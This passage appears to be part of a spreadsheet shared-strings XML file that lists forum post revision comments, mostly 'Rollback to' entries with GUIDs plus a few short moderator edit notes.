  <si>
    <t>Rollback to [1E933FA5-262A-4520-946A-C6661DA32EEF]</t>
  </si>
  <si>
    <t>Greetings Add/Remove</t>
  </si>
  <si>
    <t>31873ea6-b92a-49fb-843e-3b40a5ac5db5</t>
  </si>
  <si>
    <t>Rollback to [bbe14971-cf5d-45be-85d2-0c87dfeb9f66]</t>
  </si>
  <si>
    <t>57786ced-cdce-426a-aac7-1abb738f5d7c</t>
  </si>
  <si>
    <t>Rollback to [49c08b62-73db-44e0-9608-930df8c5e9ad]</t>
  </si>
  <si>
    <t>e98c4023-781f-4454-a7b2-de0964419502</t>
  </si>
  <si>
    <t>Rollback to [EBEBBC45-7BE4-41E6-B943-319551BE1481]</t>
  </si>
  <si>
    <t>b6e2f217-4673-46ab-a847-2f31a2829f04</t>
  </si>
  <si>
    <t>Rollback to [2789cc47-e818-447d-bfbe-13f5b9e6c2c9]</t>
  </si>
  <si>
    <t>90c4bd87-9158-4536-806e-6aa253a887f4</t>
  </si>
  <si>
    <t>Rollback to [7194f91e-ab7d-40d7-84ff-5b0e61a5053c]</t>
  </si>
  <si>
    <t>64b36d73-5026-4a7d-be74-db427ff822f5</t>
  </si>
  <si>
    <t>Rollback to [7eb59008-bdb2-4b51-be37-800ca99d987d]</t>
  </si>
  <si>
    <t>bce424ee-4759-49f3-a666-6742b4e813ed</t>
  </si>
  <si>
    <t>Rollback to [4BBCFC1F-CA54-4DB9-AC0A-578BB34B6A7A]</t>
  </si>
  <si>
    <t>775a6339-9764-4019-8cd5-133d81963bbc</t>
  </si>
  <si>
    <t>Rollback to [5195433A-48E2-47AE-A9E7-6BEB65CC8604]</t>
  </si>
  <si>
    <t>ee7aa7a9-e053-4208-9b9d-5a28fc0bfa91</t>
  </si>
  <si>
    <t>Rollback to [A8F5C516-90E8-4EC0-B0C7-75736B4DBD84]</t>
  </si>
  <si>
    <t>eb2e8812-a1c6-4be9-8a1e-598061f084e8</t>
  </si>
  <si>
    <t>Rollback to [dc94ae98-a7bd-4b34-a819-8aa79f561baf]</t>
  </si>
  <si>
    <t>ddfc7d2f-ce4e-4bfd-bda5-f8fb921b7922</t>
  </si>
  <si>
    <t>Rollback to [6ED8A6C3-E5F1-40D8-8560-FEE3C22A8C62]</t>
  </si>
  <si>
    <t>Undesired Code Change</t>
  </si>
  <si>
    <t>6f42aebb-e37b-47ea-9c53-351446fb3e48</t>
  </si>
  <si>
    <t>Rollback to [1c3c889b-5127-406d-8196-9bd455ba79d7]</t>
  </si>
  <si>
    <t>95c36f83-ba9f-4fe9-a8f3-af21bcc3994c</t>
  </si>
  <si>
    <t>Rollback to [be11b2b4-8ea0-42bf-b1cc-24c51a25cbb3]</t>
  </si>
  <si>
    <t>ca8ecba2-a5c8-4e39-8f0a-31d2dab9618e</t>
  </si>
  <si>
    <t>Rollback to [757208C9-40D9-47FF-93EC-8184E3EF776D]</t>
  </si>
  <si>
    <t>c71e224b-962c-41bb-ab44-d24a3f37f349</t>
  </si>
  <si>
    <t>Rollback to [45e833ab-6ad4-40f6-8c7c-c37c43301e0d]</t>
  </si>
  <si>
    <t>14e3ac80-d2f9-45b5-8ade-3ff03629d411</t>
  </si>
  <si>
    <t>Rollback to [f52b0505-bd86-4cdd-9971-3b3491476fc8]</t>
  </si>
  <si>
    <t>aa1b85f2-0845-4f45-a085-af22b653db06</t>
  </si>
  <si>
    <t>Rollback to [c68f5c53-6435-4689-84ef-9d1c7cdca67e]</t>
  </si>
  <si>
    <t>a64e7d0b-8063-4e67-8cdd-2ca1fb353260</t>
  </si>
  <si>
    <t>Rollback to [8E1F499C-1A8F-4F0C-959F-80C4C43E3D4C]</t>
  </si>
  <si>
    <t>b130638f-27f6-4495-94b3-6f2ad56170e6</t>
  </si>
  <si>
    <t>Rollback to [8c7e2598-002e-491e-ba47-fe8b56eeecd3]</t>
  </si>
  <si>
    <t>e28b0bad-bc1c-4e1f-878d-06c746c9f423</t>
  </si>
  <si>
    <t>Rollback to [efb4492c-7482-47cd-8d1a-cc930edd1472] - Edit approval overridden by post owner or moderator</t>
  </si>
  <si>
    <t>1246d9da-0b14-4fab-87f9-9b67ad75cf16</t>
  </si>
  <si>
    <t>Rollback to [6ec4523c-5dd3-4940-940b-002ff91a9b6d]</t>
  </si>
  <si>
    <t>6beff5e9-7142-4e64-8aa2-c6c7328c4db6</t>
  </si>
  <si>
    <t>Rollback to [64beda7d-a257-4134-a5a6-a45dfd6186db]</t>
  </si>
  <si>
    <t>fceff577-5ec0-4a85-9b2c-54af146a585d</t>
  </si>
  <si>
    <t>Rollback to [EF881725-6488-4EC6-A190-AEC5A5FD5BA2]</t>
  </si>
  <si>
    <t>8deeb1d8-5297-4233-a143-a3949c38ddda</t>
  </si>
  <si>
    <t>Rollback to [6ADB6C1E-C07E-41B2-8988-49527C1E05B5]</t>
  </si>
  <si>
    <t>14fe078b-be8a-4d77-ba27-2cce8662e619</t>
  </si>
  <si>
    <t>Rollback to [1EE5AF3C-9B75-4C53-A91B-79EA8909168E]</t>
  </si>
  <si>
    <t>2a3e4c33-0a1e-405d-b221-7f1ceb4c57ac</t>
  </si>
  <si>
    <t>Rollback to [9107bb0a-fd34-4544-a2f0-89fd4e51d2d4]</t>
  </si>
  <si>
    <t>ff29f3d9-5d63-4fbc-9da0-bdddf07fe7d2</t>
  </si>
  <si>
    <t>Rollback to [0004a894-d46d-4caf-b98e-6901f0728829]</t>
  </si>
  <si>
    <t>83c6c702-3632-479d-803e-ed6e3144aa6b</t>
  </si>
  <si>
    <t>Rollback to [066B5918-72B1-4DC2-A501-185BDCEED7F9]</t>
  </si>
  <si>
    <t>b2d820bc-8938-4dc4-8dba-e857ec50bbdb</t>
  </si>
  <si>
    <t>Rollback to [e79cb952-7f36-4924-b0ee-9a5c73c0fd32] - Reverted back to original text. Really useless wordsmithing.</t>
  </si>
  <si>
    <t>9e7b0b85-881c-4e26-b1bd-3b69b152e7e8</t>
  </si>
  <si>
    <t>Rollback to [55CE130D-BC8D-49C1-B8A3-C95E28283735]</t>
  </si>
  <si>
    <t>56486c30-eb1e-493b-9369-e8250074bd7d</t>
  </si>
  <si>
    <t>Rollback to [05aaac8f-be84-429e-b0a6-354b89a7d37c] - Rollback as the code might be useful to someone if they're having a similar problem.</t>
  </si>
  <si>
    <t>6a6c77c3-9510-482c-92c2-d3114cf80216</t>
  </si>
  <si>
    <t>Rollback to [058246fb-f601-4f9c-a1aa-56d3031c7395]</t>
  </si>
  <si>
    <t>8bd9ab34-8708-4964-adc0-161f660b348c</t>
  </si>
  <si>
    <t>Rollback to [3ff1461c-4e16-4dbc-81da-798794672ac3]</t>
  </si>
  <si>
    <t>9a1c58da-b41f-45db-9746-4d1b238e74be</t>
  </si>
  <si>
    <t>Rollback to [26d879db-b982-4eed-b37c-1252c08d5d04]</t>
  </si>
  <si>
    <t>99aee154-6fb9-4799-8dcb-4198260c9806</t>
  </si>
  <si>
    <t>Rollback to [43fb0e6c-4379-4747-9228-0f7acfc708f7]</t>
  </si>
  <si>
    <t>b572e084-da10-423a-b845-c4435a61cd87</t>
  </si>
  <si>
    <t>Rollback to [aa006d14-b735-4d3e-b405-81414adb9919]</t>
  </si>
  <si>
    <t>51d5ae9f-b01a-45d0-8dcd-40e647ebce31</t>
  </si>
  <si>
    <t>Rollback to [07ffbd3b-4bbb-4c57-8974-d643db967151]</t>
  </si>
  <si>
    <t>1ebd0676-c141-4d68-ace4-3d713e67491a</t>
  </si>
  <si>
    <t>Rollback to [A9446765-7CAF-4ED0-B876-47F3F971AB62]</t>
  </si>
  <si>
    <t>a5208acc-9089-4159-8d74-6934a38aed9a</t>
  </si>
  <si>
    <t>Rollback to [ee82a93a-74cb-4504-863b-4e2137023763]</t>
  </si>
  <si>
    <t>2ce843df-1f09-40a4-8aba-75d8ea11f5fd</t>
  </si>
  <si>
    <t>Rollback to [4d9da071-4143-405d-9fa6-84b4231698d3]</t>
  </si>
  <si>
    <t>5d0f1f76-4f68-4058-9f97-e12b460ac906</t>
  </si>
  <si>
    <t>Rollback to [a48441a0-7852-4794-a800-e11811d78629]</t>
  </si>
  <si>
    <t>adf8bc8c-9acb-4b75-900d-25c8453e50e9</t>
  </si>
  <si>
    <t>Rollback to [83EF7507-E38D-45DD-8D00-868AFF3BDEF5]</t>
  </si>
  <si>
    <t>6ac3351e-bcec-4881-9a21-22fcdebd05e0</t>
  </si>
  <si>
    <t>Rollback to [6070C9E1-BFE8-4775-AEC4-5EA6B07916D6]</t>
  </si>
  <si>
    <t>22c57ea2-31f6-4dc7-984e-c6cff07337b5</t>
  </si>
  <si>
    <t>Rollback to [cf2562b2-d4e3-4c3e-9324-288a9e6e60eb]</t>
  </si>
  <si>
    <t>75eb93d4-8057-47eb-b810-f143343bca90</t>
  </si>
  <si>
    <t>Rollback to [82aa509b-9c82-4507-9d67-a30c3f63f14c]</t>
  </si>
  <si>
    <t>Duplication Note</t>
  </si>
  <si>
    <t>e88d76c2-189f-4eac-ab4d-70d7699cb34a</t>
  </si>
  <si>
    <t>Rollback to [4F15AE0B-B046-4AAD-984E-8A178CE19E1D]</t>
  </si>
  <si>
    <t>c4550826-c660-493e-ab12-f44c8cf63fdc</t>
  </si>
  <si>
    <t>Rollback to [ccc2bc42-d541-484e-b136-a459d8f2284e]</t>
  </si>
  <si>
    <t>a275707e-18e7-4b8e-ada5-503d391fc1d2</t>
  </si>
  <si>
    <t>Rollback to [0AB354B4-8A13-4498-BEC0-B31CC494750A]</t>
  </si>
  <si>
    <t>e77e641f-b6c2-46c7-afc6-b56b09ff5a03</t>
  </si>
  <si>
    <t>Rollback to [4A0671D8-082A-48FA-AA54-8B1C9C6E73B9]</t>
  </si>
  <si>
    <t>09d82380-edde-483f-844f-0df6cdeddd9e</t>
  </si>
  <si>
    <t>Rollback to [ff651f66-5504-46e1-8cc5-5107c2e7603b]</t>
  </si>
  <si>
    <t>80a48751-0862-4cb3-9224-0cdbeaf558cc</t>
  </si>
  <si>
    <t>Rollback to [1320f102-d496-4ccc-94c9-3177a60324a6]</t>
  </si>
  <si>
    <t>172feb51-7ec7-4a1d-95f3-fb9aa718c951</t>
  </si>
  <si>
    <t>Rollback to [73FBB30E-A3FA-4653-93B0-8CF1B145BB07]</t>
  </si>
  <si>
    <t>230fdd64-6d56-438e-89c3-ba0643e59ae0</t>
  </si>
  <si>
    <t>Rollback to [2e8529c4-6b40-4e42-ad36-e52536340fe0]</t>
  </si>
  <si>
    <t>b2a0022c-959d-4f00-915c-38a85de3c602</t>
  </si>
  <si>
    <t>Rollback to [BCC11676-721B-476B-A390-802EA65CB746]</t>
  </si>
  <si>
    <t>92d35081-386e-469a-b6df-76c867315dcc</t>
  </si>
  <si>
    <t>Rollback to [dbd25b7f-0463-41c7-bf8e-58f8301d697e]</t>
  </si>
  <si>
    <t>dc90d354-c66c-4d83-9959-967a84ab24d0</t>
  </si>
  <si>
    <t>Rollback to [93649B34-ADD6-40E9-A878-6C88A177069D]</t>
  </si>
  <si>
    <t>d0f3990e-251a-4414-8668-2d407d4563e6</t>
  </si>
  <si>
    <t>Rollback to [c393039f-1c78-407d-b794-bd5b930a7f3d]</t>
  </si>
  <si>
    <t>1d6cb55b-accd-45c5-a3c7-06f4e0ae3040</t>
  </si>
  <si>
    <t>Rollback to [E686EBA7-7003-4E28-B68F-C60AFD01D699]</t>
  </si>
  <si>
    <t>07eba4cd-3091-496f-953d-24a3efd62b8a</t>
  </si>
  <si>
    <t>Rollback to [4dd5bb86-44c9-4876-b613-06597ab43145]</t>
  </si>
  <si>
    <t>dd6a3d55-7c23-4609-91a9-ad3bf76e25a0</t>
  </si>
  <si>
    <t>Rollback to [CE019062-13B6-4630-BE84-1DC523970B60]</t>
  </si>
  <si>
    <t>def6aed7-1ccd-4bf5-8508-f84f88553093</t>
  </si>
  <si>
    <t>Rollback to [060ed204-92cf-4654-b2a1-6e111a1861f4]</t>
  </si>
  <si>
    <t>d823dc9d-901e-4291-89dc-d7658ecd4657</t>
  </si>
  <si>
    <t>Rollback to [2d69f6e6-ad9d-4b0e-b2b2-4cf62d5d6c2d]</t>
  </si>
  <si>
    <t>c15a2650-ebc1-4881-b8bb-18f905a6b9fc</t>
  </si>
  <si>
    <t>Rollback to [77806B45-1C7D-42C0-9803-9C0B8F0609C7]</t>
  </si>
  <si>
    <t>cf30dce6-3d76-4be6-808b-4024c362d3b9</t>
  </si>
  <si>
    <t>Rollback to [52B310FE-9232-40DC-89BC-B5D2233BCE2E]</t>
  </si>
  <si>
    <t>8d1a56f4-9d63-429c-832d-4027516853e9</t>
  </si>
  <si>
    <t>Rollback to [2629A762-7C34-44CB-BCFF-1CB0C02D1D4B]</t>
  </si>
  <si>
    <t>fe5dd0c7-45f0-498d-9eba-ff9d8508d246</t>
  </si>
  <si>
    <t>Rollback to [8cb9eaed-1818-4043-94e4-da0b441d78fb]</t>
  </si>
  <si>
    <t>2050c618-edfe-4b2a-b95b-3be8e8da3674</t>
  </si>
  <si>
    <t>Rollback to [2866333b-9569-4ba0-a21d-df24fc80709a]</t>
  </si>
  <si>
    <t>283b5ddf-b94c-4d59-bac1-96ef47da901f</t>
  </si>
  <si>
    <t>Rollback to [7c2578de-6b69-40d9-9ea4-2a54b4a9ff4f]</t>
  </si>
  <si>
    <t>ace6a4af-5af6-461c-beaf-d0a8b8f970f7</t>
  </si>
  <si>
    <t>Rollback to [883b3c38-27da-4d7d-9a01-aa773c3d694b]</t>
  </si>
  <si>
    <t>43f0f2a8-897f-4fb3-8038-82b0f724b99f</t>
  </si>
  <si>
    <t>Rollback to [6ACD5F51-0722-4C7B-97C8-7FE58D724F8F]</t>
  </si>
  <si>
    <t>ccdb5ff7-b3b7-44ab-87bc-847452e62bca</t>
  </si>
  <si>
    <t>Rollback to [7d84cacd-b76b-4eeb-a461-f54bdf716bb7]</t>
  </si>
  <si>
    <t>efff2b9e-5e64-46c9-bbde-d7c658a551fc</t>
  </si>
  <si>
    <t>Rollback to [81A1E9C6-A10D-43B8-972E-55081AA020B2]</t>
  </si>
  <si>
    <t>d1167322-ffd9-482b-8ced-ca5dc7d95306</t>
  </si>
  <si>
    <t>Rollback to [26EDE9AB-075C-4EA6-A19A-062D3B29696B]</t>
  </si>
  <si>
    <t>bacb9308-28a4-4815-afe6-6a83e1025404</t>
  </si>
  <si>
    <t>Rollback to [1a905002-e400-4d89-bb8a-40c5178aaaf4] - Edit approval overridden by post owner or moderator</t>
  </si>
  <si>
    <t>41a9a19f-a3c5-4437-a744-bbfd23306a52</t>
  </si>
  <si>
    <t>Rollback to [A27B51E9-ACD2-4794-A76C-CF14CB0FA261]</t>
  </si>
  <si>
    <t>1e015e60-3d91-40fb-ba0e-7a510e9e361d</t>
  </si>
  <si>
    <t>Rollback to [00143A6B-BA1A-4811-B250-DEDE65B9A2D6]</t>
  </si>
  <si>
    <t>4da97c24-d641-4b58-9a08-9dd94eec49c1</t>
  </si>
  <si>
    <t>Rollback to [4bd62139-ca0a-4e0e-9789-10016612e70d]</t>
  </si>
  <si>
    <t>af8c0588-c836-4440-bb8f-ec01b66aa981</t>
  </si>
  <si>
    <t>Rollback to [bed298be-b0e1-45c2-ab73-d271a0362735]</t>
  </si>
  <si>
    <t>abb911d0-a146-49b5-a294-2e4ce03872f6</t>
  </si>
  <si>
    <t>Rollback to [5C54EB7B-0FA3-4393-8202-0EE6311B6C99]</t>
  </si>
  <si>
    <t>10ce73ed-b529-442f-a7d7-69c217ab6718</t>
  </si>
  <si>
    <t>Rollback to [a41f43d9-a332-4373-a11f-8cf62435bc99]</t>
  </si>
  <si>
    <t>5b42a4be-d069-4b08-bbd1-0378d87630ab</t>
  </si>
  <si>
    <t>Rollback to [04f848aa-0f32-46fa-a511-671758fd53d4]</t>
  </si>
  <si>
    <t>e84e33e4-210a-4096-a317-5d9caab4a1b8</t>
  </si>
  <si>
    <t>Rollback to [A4DD03FD-E9DE-4A86-AEA6-0C94DAE4F610]</t>
  </si>
  <si>
    <t>8420edfc-d92c-4940-86ed-62f0b97eeb7f</t>
  </si>
  <si>
    <t>Rollback to [f4758a34-5e03-4b82-b3d7-79c4a779e4bc]</t>
  </si>
  <si>
    <t>6248fdb0-ebc1-4016-9ab5-828fd190c75f</t>
  </si>
  <si>
    <t>Rollback to [0EA9F754-2798-45A1-9089-70F981F02D65]</t>
  </si>
  <si>
    <t>aed08219-10b4-4434-9089-aa2d9f863875</t>
  </si>
  <si>
    <t>Rollback to [94FA69AC-8527-447B-B6FA-4004EB577D80]</t>
  </si>
  <si>
    <t>05921a23-2dc0-4d8c-878b-464d7bd133e5</t>
  </si>
  <si>
    <t>Rollback to [7ED2E344-BEC0-410F-9287-7D4A74AAD697]</t>
  </si>
  <si>
    <t>357996b2-f9ba-4e13-9af0-e88fad193ef5</t>
  </si>
  <si>
    <t>Rollback to [783D6A96-D167-4F5F-B8C0-DC48A68A8713]</t>
  </si>
  <si>
    <t>6c86bc23-5b70-4357-9a68-a2a788797821</t>
  </si>
  <si>
    <t>Rollback to [5650211a-31f5-4140-9bcf-6bf7c37d0faf]</t>
  </si>
  <si>
    <t>b8cff386-6d9b-4e91-bd4c-594b2ee037f9</t>
  </si>
  <si>
    <t>Rollback to [a49e4ac8-5864-4371-b90d-4ba6f8fba7b9] - Edit approval overridden by post owner or moderator</t>
  </si>
  <si>
    <t>818ba859-918a-4bb7-8dbf-9b8d906c02f6</t>
  </si>
  <si>
    <t>Rollback to [A0A92CA8-DBDE-45EE-AB62-4C72D2699353]</t>
  </si>
  <si>
    <t>29a9393c-ea7a-49ee-8eb0-6b2316e3cb20</t>
  </si>
  <si>
    <t>Rollback to [d9e39a97-bca9-4684-9bc3-1b9017559583]</t>
  </si>
  <si>
    <t>97d2a3a3-2531-41f6-bde4-6c684eae6987</t>
  </si>
  <si>
    <t>Rollback to [28115a68-3b3d-423c-832d-ae49cca82a7b]</t>
  </si>
  <si>
    <t>02756c0d-6541-4d8c-b6b4-23538810c49e</t>
  </si>
  <si>
    <t>Rollback to [495c9376-4345-4f4c-9510-3963033f4de1]</t>
  </si>
  <si>
    <t>5fa078fe-8fa3-46e7-b935-b81131e63f29</t>
  </si>
  <si>
    <t>Rollback to [728e478b-d51f-4af6-8b1b-1cc6d033c078]</t>
  </si>
  <si>
    <t>79aee101-9464-470d-8d79-2b4fe6622a05</t>
  </si>
  <si>
    <t>Rollback to [BBCAFC37-04CC-4E23-BAE8-5C1A0DAE5291]</t>
  </si>
  <si>
    <t>c2b3d994-b732-4198-93b0-03bd1a394082</t>
  </si>
  <si>
    <t>Rollback to [129dc702-c47e-477c-9288-b1c298a07bae]</t>
  </si>
  <si>
    <t>fdf6cf96-4daf-4a8e-ae4c-872ae82860e3</t>
  </si>
  <si>
    <t>Rollback to [6e14e430-6581-426f-8da4-ca601a7a573c]</t>
  </si>
  <si>
    <t>47f1dfc2-204f-4746-977f-833ee3c2908d</t>
  </si>
  <si>
    <t>Rollback to [d6b04f35-f1f3-465e-b693-bf747fee13ee]</t>
  </si>
  <si>
    <t>7e8363a0-b3cc-43e2-98c0-8477aee2b548</t>
  </si>
  <si>
    <t>Rollback to [F5A06569-2B96-4840-897A-2131337B6EC4]</t>
  </si>
  <si>
    <t>fb45804f-894c-4969-854a-48756270d240</t>
  </si>
  <si>
    <t>Rollback to [FECA4F4A-14E6-42E7-989A-76B09250C7E8]</t>
  </si>
  <si>
    <t>8dfbe2bd-19ba-4e0d-a618-c9bc5a1b96ba</t>
  </si>
  <si>
    <t>Rollback to [ffc1f59a-636a-4faf-8a70-53e6a403a392]</t>
  </si>
  <si>
    <t>5b3bdace-8506-43f7-84db-78e830f19f9c</t>
  </si>
  <si>
    <t>Rollback to [EAE869B0-A538-4397-95F1-25FCDD1590DA]</t>
  </si>
  <si>
    <t>a25948ed-25d4-493e-9b81-d4b3e682435e</t>
  </si>
  <si>
    <t>Rollback to [1978C5A4-0590-4096-A67C-5E6771425134]</t>
  </si>
  <si>
    <t>64ce641b-854f-47f0-959f-9e2ac4e6b04b</t>
  </si>
  <si>
    <t>Rollback to [53D4F9E2-0BCF-415B-9099-9E2F7ED69A74]</t>
  </si>
  <si>
    <t>ea92c663-a500-4d48-a54f-7a35defca804</t>
  </si>
  <si>
    <t>Rollback to [eac2fece-c3c3-485d-97d1-b6fa11126d38]</t>
  </si>
  <si>
    <t>848c4c1d-a3d7-43da-9c81-6bc2ba792f63</t>
  </si>
  <si>
    <t>Rollback to [ba7714d5-4cce-4fb3-9610-528e4132e82a]</t>
  </si>
  <si>
    <t>afa3cd6e-03ef-46d6-9656-5af5be5d8254</t>
  </si>
  <si>
    <t>Rollback to [8C9EC125-D50D-4DA0-A9FE-C34B5E9E07D3]</t>
  </si>
  <si>
    <t>85fa8f69-63ab-431c-b874-fcd9da14b93c</t>
  </si>
  <si>
    <t>Rollback to [1BF4B29A-A92C-4198-96CE-B1F7F773582C]</t>
  </si>
  <si>
    <t>9b3d487e-583c-4428-9e07-a8db052acab0</t>
  </si>
  <si>
    <t>Rollback to [502c2e1b-30b6-4cad-bf5d-baf2236fb699]</t>
  </si>
  <si>
    <t>d51e69db-8e71-4686-9747-1180a7e06587</t>
  </si>
  <si>
    <t>Rollback to [E3C24760-45C9-4FFB-A6E5-633DAC692119]</t>
  </si>
  <si>
    <t>40f6f0f3-303f-47b3-9a98-c38d8286efdf</t>
  </si>
  <si>
    <t>Rollback to [73f0b289-a148-48b5-9992-d3cbe980c017]</t>
  </si>
  <si>
    <t>57b4e095-3ff5-45c2-84a3-533d390adab1</t>
  </si>
  <si>
    <t>Rollback to [E37A5C06-F05D-4491-855D-D3B24A91FC43]</t>
  </si>
  <si>
    <t>ea6760c7-71e4-49ed-90c4-ae610d6cd67e</t>
  </si>
  <si>
    <t>Rollback to [3D141B96-78AA-4CB1-85D1-432E3DE700B0]</t>
  </si>
  <si>
    <t>4fc47329-2cb1-4e89-b0c9-a665c36e9d7e</t>
  </si>
  <si>
    <t>Rollback to [2C3B9502-9570-4B0F-8796-1A207D894394]</t>
  </si>
  <si>
    <t>d359b806-7558-436e-8418-2ca9ece52e19</t>
  </si>
  <si>
    <t>Rollback to [d8fa567e-013b-4d56-878d-18b125d0e627]</t>
  </si>
  <si>
    <t>1c92b9a5-fbb9-4d04-8985-5f4f57aba367</t>
  </si>
  <si>
    <t>Rollback to [BCE52772-FA16-499A-BCE3-154400A4E0BF]</t>
  </si>
  <si>
    <t>7a03c1e8-951f-4d0c-b31c-1c5dca6a626e</t>
  </si>
  <si>
    <t>Rollback to [dc4d78f8-6542-47d0-a281-1aaa05d85196]</t>
  </si>
  <si>
    <t>da227531-ed92-4765-910b-7e10c2ce1a2e</t>
  </si>
  <si>
    <t>Rollback to [85051939-ca15-488e-9dd3-de1b9522c639]</t>
  </si>
  <si>
    <t>b5319ed0-6a4c-4b4e-b99b-1ad21d699281</t>
  </si>
  <si>
    <t>Rollback to [1c2de296-2bfb-4c84-8f55-1d295062be25]</t>
  </si>
  <si>
    <t>64e0f06d-cecb-4f13-a652-93be476d2a7c</t>
  </si>
  <si>
    <t>Rollback to [733B3B9E-DED0-4509-AFFE-D00EB960D79E]</t>
  </si>
  <si>
    <t>688d0be9-b73c-4871-8c41-e2388ab2127a</t>
  </si>
  <si>
    <t>Rollback to [C4128211-DDD8-4F19-B815-836C5BF8FF55]</t>
  </si>
  <si>
    <t>a75b7c9e-b93f-4ce3-82e2-0e70af7f6e0c</t>
  </si>
  <si>
    <t>Rollback to [f8bb8522-7d81-492e-b937-5c1b28bccb83]</t>
  </si>
  <si>
    <t>b130df45-2fed-4ed6-836e-dbbb2eb22f8e</t>
  </si>
  <si>
    <t>Rollback to [1522632c-2299-453b-a9dd-a570bb680b26]</t>
  </si>
  <si>
    <t>9f144f4a-a65b-401f-8838-28b295ebd051</t>
  </si>
  <si>
    <t>Rollback to [EC037A7B-CE22-4A94-9F38-87080D9C631C]</t>
  </si>
  <si>
    <t>ee7f36a9-0726-40cc-bdf9-17e302426272</t>
  </si>
  <si>
    <t>Rollback to [7FFEC461-24CF-40AA-9291-AF29E09E990C]</t>
  </si>
  <si>
    <t>ff8713cb-27d7-47fc-8ffd-d9f302d815ae</t>
  </si>
  <si>
    <t>Rollback to [1f5156bf-84aa-45c0-ac12-89c258837dda]</t>
  </si>
  <si>
    <t>b6cb803b-f15c-44ef-9e79-f57b71ca73c7</t>
  </si>
  <si>
    <t>Rollback to [d4b1f79d-3a54-43f6-887e-48b794947961]</t>
  </si>
  <si>
    <t>1bf7b527-3901-4a29-90e8-cb6770ae4dc2</t>
  </si>
  <si>
    <t>Rollback to [A530EC46-4071-42F2-8A94-D98795258649]</t>
  </si>
  <si>
    <t>ff644415-ddba-4b22-8d4d-db1e9459aa79</t>
  </si>
  <si>
    <t>Rollback to [60d8007e-1d0f-44f7-8e62-f5fb8ec450cd]</t>
  </si>
  <si>
    <t>00253a9a-d3af-41ae-bacd-86073c944426</t>
  </si>
  <si>
    <t>Rollback to [C02DFF00-3A05-424C-9A78-C77E45E724BD]</t>
  </si>
  <si>
    <t>37b51f75-e239-4519-85e3-01137e963ac3</t>
  </si>
  <si>
    <t>Rollback to [F29B46A6-CE1B-427E-B80B-F0A1C8E5FE24]</t>
  </si>
  <si>
    <t>f14d4bfb-1cb7-4d51-86fc-24e1c4b65e04</t>
  </si>
  <si>
    <t>Rollback to [71d5e3d4-e334-4141-b8cb-c516f2979d65]</t>
  </si>
  <si>
    <t>eae608c6-3852-44d6-afef-b8a40947aaa4</t>
  </si>
  <si>
    <t>Rollback to [B83C2700-8574-425C-B755-50B0DA22B52A]</t>
  </si>
  <si>
    <t>d3e95a6c-becd-4e14-89bd-38bdba4cb87e</t>
  </si>
  <si>
    <t>Rollback to [73a4324e-9861-40c5-83f0-b056b0aa6cb7] - Edit approval overridden by post owner or moderator</t>
  </si>
  <si>
    <t>1291749e-e882-4b45-9817-8a2861e0035c</t>
  </si>
  <si>
    <t>Rollback to [9cd906ba-3cd5-4892-8d49-7e36716f73b7]</t>
  </si>
  <si>
    <t>23d4b3e6-ada0-45c0-ba7c-2f6a20263703</t>
  </si>
  <si>
    <t>Rollback to [949C9681-4055-467D-B890-EB1105E8B53C]</t>
  </si>
  <si>
    <t>1172822d-db6e-4d50-83ad-28c0c696d148</t>
  </si>
  <si>
    <t>Rollback to [E4F52ECB-7F09-4F40-82EC-878357A6D340]</t>
  </si>
  <si>
    <t>dda6b302-0df8-43e2-85d0-211ac21bb461</t>
  </si>
  <si>
    <t>Rollback to [619340AA-F2BB-488C-A694-A6468AA18B79]</t>
  </si>
  <si>
    <t>0a5abe03-7d8a-4d9f-920f-8dcc2e0d3572</t>
  </si>
  <si>
    <t>Rollback to [3D513537-4643-499C-A42A-6296059961CA]</t>
  </si>
  <si>
    <t>8c9939a3-419b-4e34-90ee-da23f183ce9e</t>
  </si>
  <si>
    <t>Rollback to [544B563F-42A3-4C50-BB6A-15BBDA73528D]</t>
  </si>
  <si>
    <t>dd0f59dd-564b-4c39-b864-c1661751375a</t>
  </si>
  <si>
    <t>Rollback to [9fe6a9e9-520c-4a03-9169-5e5c51fae095]</t>
  </si>
  <si>
    <t>a3632c70-252f-4f9d-b8cf-03f19d2e74eb</t>
  </si>
  <si>
    <t>Rollback to [9ae52865-7587-4672-a9ad-c0c2d139d1ab]</t>
  </si>
  <si>
    <t>9c2e10cf-b409-4721-984e-6855c97aa9c9</t>
  </si>
  <si>
    <t>Rollback to [53392282-c718-4052-9b9c-800bd42a1020]</t>
  </si>
  <si>
    <t>74e2f010-c989-4e8e-8931-f598bbaa245e</t>
  </si>
  <si>
    <t>Rollback to [2514b5bf-6222-48e6-9c51-92fff28e2abe]</t>
  </si>
  <si>
    <t>f313bec2-5595-4e61-898c-9a305a426330</t>
  </si>
  <si>
    <t>Rollback to [8fd2f6d0-6ab2-407a-a642-48b2ce844e9f]</t>
  </si>
  <si>
    <t>9cea6607-10e3-4931-9439-8d57d8804ee3</t>
  </si>
  <si>
    <t>Rollback to [B026F595-0C51-425E-A3B8-7AA089F5B6F2]</t>
  </si>
  <si>
    <t>9eb2f9d5-7f2a-4e92-8222-4fd75c72dc86</t>
  </si>
  <si>
    <t>Rollback to [0209CD2E-6C7B-42F3-9C9D-685D4C536A00]</t>
  </si>
  <si>
    <t>14fcea71-7551-4bb7-9199-074911238b32</t>
  </si>
  <si>
    <t>Rollback to [d47989c1-c11d-47c2-b7cf-249da239968f]</t>
  </si>
  <si>
    <t>ef177955-9053-4874-b984-7c76f5d92b7e</t>
  </si>
  <si>
    <t>Rollback to [BA90D85A-EA2F-423C-87AF-D633CF815FB9]</t>
  </si>
  <si>
    <t>1e8c5467-a374-45ed-87a0-d9095152eb4a</t>
  </si>
  <si>
    <t>Rollback to [6444ED74-5623-4982-ABF5-F9602BC6E45E]</t>
  </si>
  <si>
    <t>6edf61a4-b6d8-4179-aff0-fb02e04128ed</t>
  </si>
  <si>
    <t>Rollback to [507831ba-08a5-4fa4-a4a2-f19a54783b58]</t>
  </si>
  <si>
    <t>0eb1f955-a9f4-4eb2-926b-5b4cd9c7a6c9</t>
  </si>
  <si>
    <t>Rollback to [7DCEA650-1D74-47D2-92F4-36CF220485DF]</t>
  </si>
  <si>
    <t>781caf9a-3fa9-49fe-960f-3dfd944396bd</t>
  </si>
  <si>
    <t>Rollback to [fbc951ce-5af8-49d8-9745-a1e24d33a871]</t>
  </si>
  <si>
    <t>45968559-66b8-4e5e-87d5-a42956420da9</t>
  </si>
  <si>
    <t>Rollback to [DCD33266-7690-41C4-B35E-4D54FFCCE7B8]</t>
  </si>
  <si>
    <t>524e235a-0615-4dcd-922c-343a54a3f11b</t>
  </si>
  <si>
